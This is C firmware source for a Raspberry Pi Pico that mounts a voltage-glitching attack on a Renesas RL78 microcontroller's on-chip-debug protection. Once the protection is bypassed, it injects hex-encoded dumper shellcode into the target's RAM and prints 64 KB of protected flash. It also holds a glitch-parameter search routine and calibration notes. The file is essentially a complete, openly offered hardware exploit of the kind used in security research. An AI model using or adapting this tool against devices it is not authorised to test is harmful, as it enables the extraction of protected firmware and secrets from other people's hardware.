
#include <stdio.h>
#include <string.h>

#include <hardware/clocks.h>
#include <hardware/gpio.h>
#include <hardware/pwm.h>
#include <pico/stdlib.h>
#include <pico/binary_info.h>

#include "tool78_hw.h"
#include "tool78_cmds.h"
#include "glitch.h"

#define TRIGGER_IN_PIN (14/*-1*/)
#define GLITCH_OUT_PIN 15

void cli_tool78_glitch_dump(void);
void cli_tool78_glitch_paramsearch(void);
void cli_tool78_glitch_ocd_dump(void);

#define DUMP_OFFSET 0/*0xef000*/
#define DUMP_SIZE 65536

// test with decoupling caps: length in 20..500(..1500) -> ok
// testing on ocd lock: length: 5..35

/*
hw inited
baudrate result=0xc1
common st=193
result: 0xc1 ver=0000
init: 193
*/
/*
baudrate result=0x06
result: 0x06. sig:
0x10 0x00 0x06 0x52 0x35 0x46 0x31 0x30 0x31 0x45 0x45 0x20 0x20 0xff 0xff 0x00 0x00 0x00 0x00 0x03 0x00 0x03 
secget: 0x06
sec: flg=fe bot=03  fsws=0000 fswe=003f
*/
//void trl78_uart1_set_exclusive(bool ex);

static uint8_t databuf[DUMP_SIZE];

static void glitch_init_core1_stuff(bool exttrig) {
	// REGC = 2.11V / 0.47..1 uF // WUFM: REGC = 1.80V // BUT: OCD mode: always 2.1!
	static struct glitch_params gparam = (struct glitch_params){
		.offset_min_us = 10,
		.offset_max_us = 35433,
		// with REGC & 10uF Vcc:
		.length_min_us = -1,//10,//-1,//20,
		.length_max_us = 100,//*8,
		// with REGC:
		/*.length_min_us = 4000,
		.length_max_us = 6300,*/
		// without REGC:
		/*.length_min_us = 20,
		.length_max_us = 70,*/
		// best glitch voltages (REGC: 1uF):
		// * with REGC, long pulses: 1700mV
		// * no REGC, short pulses: 1300mV
		// * REGC@VDD, long pulses: 42mV
		// * REGC@VDD, short pulses: 0V
		// * with REGC, 10uF@VDD, long pulses: 0..3mV (strict upper limit)
		// * 100uF@VDD: too much, even w/o REGC
		.trigger_in_pin = -2,
		.glitch_out_pin = GLITCH_OUT_PIN,
		.trigger_in_polarity = glitch_positive,
		.glitch_out_polarity = glitch_positive,
		.impl = glitch_impl_core1,
		.offset_cur = 0, .length_cur = 0
	};
	gparam.trigger_in_pin = exttrig ? TRIGGER_IN_PIN : (-1);
	glitch_ready(&gparam);
}
static void glitch_init_pwm_stuff(void) {
	const float dutycycle = (2.1f + 0.00f) / 3.3f + 0.0125f;//25f /* calibration (more) */;
	const int PIN_PWM_VREG = 22;
	const uint32_t pwm_period = /*5*/500; // 200 Hz at a 1 MHz clock freq

	uint32_t sliceno = pwm_gpio_to_slice_num(PIN_PWM_VREG);
	pwm_set_clkdiv_int_frac(sliceno, (uint8_t)(clock_get_hz(clk_sys)/1e6f), 0); // 1 MHz clock
	pwm_set_wrap(sliceno, pwm_period); // total period
	pwm_set_chan_level(sliceno, pwm_gpio_to_channel(PIN_PWM_VREG),
			(uint32_t)(pwm_period*dutycycle));
	pwm_set_phase_correct(sliceno, true);
	pwm_set_output_polarity(sliceno, false, false);
	pwm_set_clkdiv_mode(sliceno, PWM_DIV_FREE_RUNNING);
	pwm_set_enabled(sliceno, true);
	gpio_set_function(PIN_PWM_VREG, GPIO_FUNC_PWM);
}

static uint8_t exec_jmp_to_ram[] = {
	0xfc, 0x00, 0xf9, 0x0f, // call !!ff900
	0xd7,                   // ret
};

static uint8_t DATA_test_dbg__paramtest[102] = {
    0x71, 0x7b, 0xfa, 0xf5, 0xf0, 0x02, 0xf5, 0x78, 0x00, 0x71, 0x6a, 0xa4, 0xcf,
    0x76, 0x00, 0x01, 0xce, 0x22, 0x00, 0xf5, 0x62, 0x00, 0xf5, 0x77, 0x00, 0xf5,
    0x79, 0x00, 0xf5, 0x75, 0x00, 0xf5, 0x7c, 0x00, 0xce, 0x02, 0x00, 0xce, 0x02,
    0xff, 0x30, 0x00, 0xfa, 0x16, 0x52, 0x00, 0x53, 0xff, 0x51, 0x00, 0x81, 0x93,
    0xdf, 0xfc, 0x92, 0x61, 0xf9, 0xdf, 0xf3, 0xce, 0x02, 0x00, 0x52, 0x18, 0x53,
    0xff, 0x93, 0xdf, 0xfd, 0x92, 0xdf, 0xf8, 0x51, 0x48, 0xfc, 0xa1, 0xff, 0x0e,
    0x51, 0x69, 0xfc, 0xa1, 0xff, 0x0e, 0x50, 0xaa, 0x52, 0x00, 0x92, 0x61, 0xe9,
    0x61, 0x78, 0xfc, 0xa1, 0xff, 0x0e, 0xd2, 0xdf, 0xf4, 0xef, 0xbf
};

static uint8_t dumper_shellcode[0x26] = {
  //0xe0, 0x07, 0x26, // 0xF07E0 location, 0x26 length of packet
  0x41, 0x00, 0x34, 0x00, 0x00, 0x00, 0x11, 0x89, 0xFC, 0xA1, 0xFF, 0x0E, 0xA5, 0x15, 0x44,
  0x00, 0x00, 0xDF, 0xF3, 0xEF, 0x04, 0x55, 0x00, 0x00, 0x00, 0x8E, 0xFD, 0x81, 0x5C, 0x0F,
  0x9E, 0xFD, 0x71, 0x00, 0x90, 0x00, 0xEF, 0xE0
};

void cli_tool78_glitch_dump(void) {
	uint8_t passwd[10] = {0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
	uint16_t ver;
	enum tool78_stat st;
	int rr;

	ver=0;
	while (true) {
		st = tool78_init_ocd(&tool78_hw_rl78_uart1, &ver, passwd);
		if (st == 0xc3) {
			rr = tool78_hw_rl78_uart1.recv(1, &st, 120*1000*1000);
			if (rr != 1) {
				printf("aaaa\n");
				goto deinit_bad;
			}
		}
		printf("result: 0x%02x ver=%04x\n", st, ver);
		if (st != 0xf2 && st != 0xf0) {
			printf("init: %d\n", st);
			goto deinit_bad;
		}
		break;
	}

	// can't write too much at 0xf07e0 as 0xf0800 and up contains OCD state,
	// overwrite this and suddenly the OCD system resets itself
	st = tool78_ocd_write(&tool78_hw_rl78_uart1, 0x07e0,
			sizeof(exec_jmp_to_ram), exec_jmp_to_ram);
	//printf("write shellcode res 0x%02x\n", st);
	if (st != 0) {
		printf("trampoline write failed: %d\n", st);
		goto deinit_bad;
	}

	st = tool78_ocd_write(&tool78_hw_rl78_uart1, 0xf900,
			sizeof(dumper_shellcode), dumper_shellcode);
	//printf("write shellcode res 0x%02x\n", st);
	if (st != 0) {
		printf("shellcode write failed: %d\n", st);
		goto deinit_bad;
	}

	st = tool78_ocd_exec(&tool78_hw_rl78_uart1);
	//printf("exec res 0x%02x\n", st);
	if (st != 0) {
		printf("exec failed: %d\n", st);
		goto deinit_bad;
	}

	for (size_t iii = 0; iii < DUMP_SIZE + DUMP_OFFSET; ++iii) {
		// wait for completion
		size_t off = (iii < DUMP_OFFSET) ? 0 : (iii - DUMP_OFFSET);
		rr = tool78_hw_rl78_uart1.recv(1, &databuf[off], 120*1000*1000);
		if (rr != 1) {
			printf("exec code: no response :/ (%d)\n", rr);
			goto deinit_bad;
		}
	}

	for (size_t iii = 0; iii < DUMP_SIZE; ++iii) {
		printf("%02x%s", databuf[iii], ((iii & 0xf) == 0xf) ? "\n" : " ");
	}

deinit_bad:
	tool78_hw_rl78_uart1.deinit();
	return;
}

void cli_tool78_glitch_paramsearch(void) {
	glitch_init_core1_stuff(true);

	uint8_t passwd[10] = {0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
	uint16_t ver;
	enum tool78_stat st;
	int rr;
	static uint8_t checkbuf[256];
	bool first = true;

restart:
	/*glitch_disarm();
	busy_wait_ms(40);*/

	ver=0;
	st = tool78_init_ocd(&tool78_hw_rl78_uart1, &ver, passwd);
	if (st == 0xc3) {
		printf("aa\n");
		st = 0;
		rr = tool78_hw_rl78_uart1.recv(1, (uint8_t*)&st, 120*1000);
		printf("rr=%d\n", rr);
		if (rr != 1) {
			printf("aaaa\n");
			goto do_reset_stuff;
		}
	}
	//printf("result: 0x%02x ver=%04x\n", st, ver);
	if (st != 0xf2 && st != 0xf0) {
		printf("init: 0x%02x\n", st);
		goto deinit_bad;
	}
	if (first) printf("result: 0x%02x ver=%04x\n", st, ver);

	// can't write too much at 0xf07e0 as 0xf0800 and up contains OCD state,
	// overwrite this and suddenly the OCD system resets itself
	st = tool78_ocd_write(&tool78_hw_rl78_uart1, 0x07e0,
			sizeof(exec_jmp_to_ram), exec_jmp_to_ram);
	//printf("write trampoline res 0x%02x\n", st);
	if (st != 0) {
		printf("trampoline write failed: %d\n", st);
		goto deinit_bad;
	}
	st = tool78_ocd_write(&tool78_hw_rl78_uart1, 0xf900,
			sizeof(DATA_test_dbg__paramtest), DATA_test_dbg__paramtest);
	//printf("write code res 0x%02x\n", st);
	if (st != 0) {
		printf("code write failed: %d\n", st);
		goto deinit_bad;
	}

	st = tool78_ocd_exec(&tool78_hw_rl78_uart1);
	//printf("exec res 0x%02x\n", st);
	if (st != 0) {
		printf("exec failed: %d\n", st);
		goto deinit_bad;
	}

	// test custom tool_tx call
	/*rr = tool78_hw_rl78_uart1.recv(1, checkbuf, 1000);
	printf("rr=%d\n", rr);
	if (rr == 1) printf("0x%02x %c\n", stuff[0], stuff[0]);*/

	// wait for completion
	rr = tool78_hw_rl78_uart1.recv(2, checkbuf, 120*1000);
	if (rr != 2) {
		printf("exec code: no response :/ (%d)\n", rr);
		goto deinit_bad;
	}

	if (checkbuf[0] != 'H' && checkbuf[1] != 'i') {
		printf("bad response: %02x %02x\n", checkbuf[0], checkbuf[1]);
		goto deinit_bad;
	}

	rr = tool78_hw_rl78_uart1.recv(256, checkbuf, 120*1000);
	if (rr != 256) {
		printf("exec code: no data sendback (%d)\n", rr);
		goto deinit_bad;
	}

	for (size_t i = 0; i < 256; ++i) {
		if (checkbuf[i] != (0xff^0xaa)) {
			printf("bad value at index %zu: %02x\n", i, checkbuf[i]^0xaa);
			goto deinit_bad;
		}
	}
	if (first) printf("all set, let's go\n");
	first = false;

	while (true) {
		glitch_arm();
		rr = tool78_hw_rl78_uart1.recv(2, checkbuf, 120*1000);
		glitch_disarm();
		if (rr == 2 && (checkbuf[0] != 'H' || checkbuf[1] != 'i')) rr = 0;
		if (rr == 2) {
			rr = tool78_hw_rl78_uart1.recv(256, checkbuf, 120*1000);
		}

		if (rr <= 0) {
			// timeout or something
			printf("X");
			tool78_hw_rl78_uart1.deinit();
			goto do_reset_stuff;
		} else {
			int firstbad = -1, lastbad = -1;
			for (int i = 0; i < rr; ++i) {
				if (checkbuf[i] != (0xaa^0xff)) {
					if (firstbad == -1) firstbad = i;
					lastbad = i;
				}
			}
			if (firstbad >= 0) {
				volatile uint32_t
					*off = (volatile uint32_t*)&glitch_param_cur.offset_cur,
					*len = (volatile uint32_t*)&glitch_param_cur.length_cur;
				printf("glitch first=%d last=%d off=%lu len=%lu rr=%d v=%02x\n",
						firstbad, lastbad, *off, *len, rr, checkbuf[firstbad]^0xaa);
			} else printf(".");
		}
	}

deinit_bad:
	tool78_hw_rl78_uart1.deinit();
	return;

do_reset_stuff:
	tool78_hw_rl78_uart1.deinit();

	// glitch for way too long to power cycle
	sio_hw->gpio_set = 1u << GLITCH_OUT_PIN;
	busy_wait_ms(16);
	sio_hw->gpio_clr = 1u << GLITCH_OUT_PIN;

	goto restart;
}

void cli_tool78_glitch_ocd_dump(void) {
	glitch_init_core1_stuff(false);

	gpio_set_function(2, GPIO_FUNC_SIO);
	gpio_set_dir(2, GPIO_OUT);
	gpio_put(2, false);

	//gpio_set_function(3, GPIO_FUNC_SIO);
	//gpio_set_dir(3, GPIO_OUT);
	//gpio_put(3, false);

	uint8_t passwd[10] = {0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
	uint16_t ver;
	int st, rr/*, r0, r1, r2*/;
	static uint8_t checkbuf[256];
	bool first = true;

restart:
	//trl78_uart1_set_exclusive(true);
	//tool78_hw_rl78_uart1.rx_set_stop_bit(false);
	gpio_put(2, false);
	/*glitch_disarm();
	busy_wait_ms(40);*/

	ver=0;
	st = tool78_init_ocd(&tool78_hw_rl78_uart1, &ver, passwd);
	if (st == 0xc3) {
		//printf("aa\n");
		st = 0;
		rr = tool78_hw_rl78_uart1.recv(1, (uint8_t*)&st, 120*1000);
		//printf("rr=%d\n", rr);
		if (rr != 1) {
			//printf("aaaa\n");
			goto do_reset_stuff;
		}
	}
	if (first) printf("result: 0x%02x ver=%04x\n", st, ver);
	if (st == 0xc1) goto do_reset_stuff;
	if (st != 0x10) {
		printf("init: expected protect error, got %d\n", st);
		goto deinit_bad;
	}
	busy_wait_ms(16); // leave time to recharge

	// right now, the RL78 core is stuck in an infinite loop doing nothing in
	// the debug monitor part of its bootrom. however, the code we need is
	// right below it, so we can simply try to glitch it without having to meet
	// the timing
	// see https://fail0verflow.com/blog/2018/ps4-syscon/ for more info

	// try up to 16 times because we can't discern between a reset and a glitch
	// that had no effect. after 16 iterations without result, reset the RL78
	// and try again.
	// a successful glitch will output a single null byte over the TOOL0 line

	// apparently we have about 95 ms until the infinite loop gets reset into
	// the MCU flash automatically? somehow?? I suppose it's the WDT
	if (first) printf("all set, let's go\n");
	first = false;

	//tool78_hw_rl78_uart1.rx_set_stop_bit(false);
	glitch_arm();
	for (size_t i = 0; i < 16; ++i) {
		glitch_trigger_sw_core1();
		rr = tool78_hw_rl78_uart1.recv(1, checkbuf, 12*1000);
		if (rr != 1) {
			busy_wait_ms(1); // leave time to recharge
			printf(".");
			continue;
		}

		/*printf("checkbuf: %d", checkbuf[0]);
		printf("\n!!!\n");*/
		tool78_hw_rl78_uart1.flags |= tool78_hw_flag_done_reset;

		glitch_disarm();
		goto success;
	}
	glitch_disarm();

	printf(":");
do_reset_stuff:
	tool78_hw_rl78_uart1.deinit();

	// glitch for way too long to power cycle
	sio_hw->gpio_set = 1u << GLITCH_OUT_PIN;
	busy_wait_ms(16);
	sio_hw->gpio_clr = 1u << GLITCH_OUT_PIN;

	goto restart;

success:;
	gpio_put(2, true);
	//busy_wait_ms(5);
	// (02): read from above (checkbuf) code
	// 03 06 18 00 df 03
	// ^--  baud rate set response
	// 00
	// ^--  OCD entry response
	rr = tool78_hw_rl78_uart1.recv(7, &databuf[0], 10000);
	if (rr != 7) {
		printf("rr=%d, wut?\n", rr);
		goto do_reset_stuff;
	}

	busy_wait_us_32(500);

	ver = 0;
	st = tool78_ocd_version(&tool78_hw_rl78_uart1, &ver);
	if (st) {
		printf("OCD: get version failed: %d\n", st);
		goto do_reset_stuff;
	}
	printf("got ver! %04x\n", ver);

	printf("glitch len: %lu us\n", *(volatile uint32_t*)&glitch_param_cur.length_cur);
	/*goto do_reset_stuff;*/

	st = tool78_ocd_connect(&tool78_hw_rl78_uart1, passwd);
	if (st != 0xf0 && st != 0xf2) {
		printf("OCD: connect failed: %d\n", st);
		goto deinit_bad;
	}
	printf("connect! 0x%02x\n", st);

	// can't write too much at 0xf07e0 as 0xf0800 and up contains OCD state,
	// overwrite this and suddenly the OCD system resets itself
	st = tool78_ocd_write(&tool78_hw_rl78_uart1, 0x07e0,
			sizeof(exec_jmp_to_ram), exec_jmp_to_ram);
	//printf("write trampoline res 0x%02x\n", st);
	if (st != 0) {
		printf("trampoline write failed: %d\n", st);
		goto deinit_bad;
	}
	st = tool78_ocd_write(&tool78_hw_rl78_uart1, 0xf900,
			sizeof(dumper_shellcode), dumper_shellcode);
	//printf("write code res 0x%02x\n", st);
	if (st != 0) {
		printf("code write failed: %d\n", st);
		goto deinit_bad;
	}

	st = tool78_ocd_exec(&tool78_hw_rl78_uart1);
	//printf("exec res 0x%02x\n", st);
	if (st != 0) {
		printf("exec failed: %d\n", st);
		goto deinit_bad;
	}

	for (size_t iii = 0; iii < DUMP_SIZE + DUMP_OFFSET; ++iii) {
		// wait for completion
		size_t off = (iii < DUMP_OFFSET) ? 0 : (iii - DUMP_OFFSET);
		rr = tool78_hw_rl78_uart1.recv(1, &databuf[off], 120*1000*1000);
		if (rr != 1) {
			printf("exec code: no response :/ (%d)\n", rr);
			goto deinit_bad;
		}
	}

	for (size_t iii = 0; iii < DUMP_SIZE; ++iii) {
		printf("0x%02x%s", databuf[iii], ((iii & 0xf) == 0xf) ? "\n" : " ");
	}

	printf("\ndone!\n");

deinit_bad:
	tool78_hw_rl78_uart1.deinit();
	return;
}

